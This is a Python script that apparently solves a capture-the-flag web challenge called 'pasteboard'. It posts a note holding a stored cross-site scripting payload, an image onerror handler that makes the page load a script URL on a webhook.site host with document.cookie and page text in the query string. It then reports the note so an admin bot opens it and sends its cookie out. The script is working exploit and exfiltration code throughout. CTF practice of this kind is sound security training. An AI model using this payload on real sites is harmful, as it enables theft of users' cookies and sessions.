import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# The key insight: Set path.value INSIDE the onerror, BEFORE throwing the error
# This way the URL that gets loaded includes the exfiltrated data
payload = f'''<form id="errorReporter">
<input name="path" id="pathInput">
</form>
<img src=x onerror="document.getElementById('pathInput').value='//{WEBHOOK.replace('https://', '')}/steal.js?flag='+encodeURIComponent(document.cookie)+'&body='+encodeURIComponent(document.body.innerText.substring(0,200));window.lastRenderError='triggered';throw new Error()">'''

print("[*] Crafting exploit that embeds data in script URL...")
print(f"[*] When bot visits, it will request: {WEBHOOK}/steal.js?flag=<cookie_data>")
print()

session = requests.Session()
resp = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "Final", "body": payload},
    allow_redirects=False
)

if resp.status_code == 302:
    location = resp.headers.get('Location')
    note_url = f"{BASE_URL}{location}"
    
    print(f"[+] Created: {note_url}")
    
    report_resp = session.post(f"{BASE_URL}/report", data={"url": location})
    
    if report_resp.status_code == 202:
        print(f"[+] Reported to bot!")
        print()
        print(f"[*] Check webhook in 30-40 seconds:")
        print(f"    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
        print()
        print(f"[*] Look for GET request to /steal.js with 'flag' parameter")
        print(f"[*] The flag will be in the query string!")
    else:
        print(f"[-] Report failed: {report_resp.status_code}")
else:
    print(f"[-] Paste creation failed: {resp.status_code}")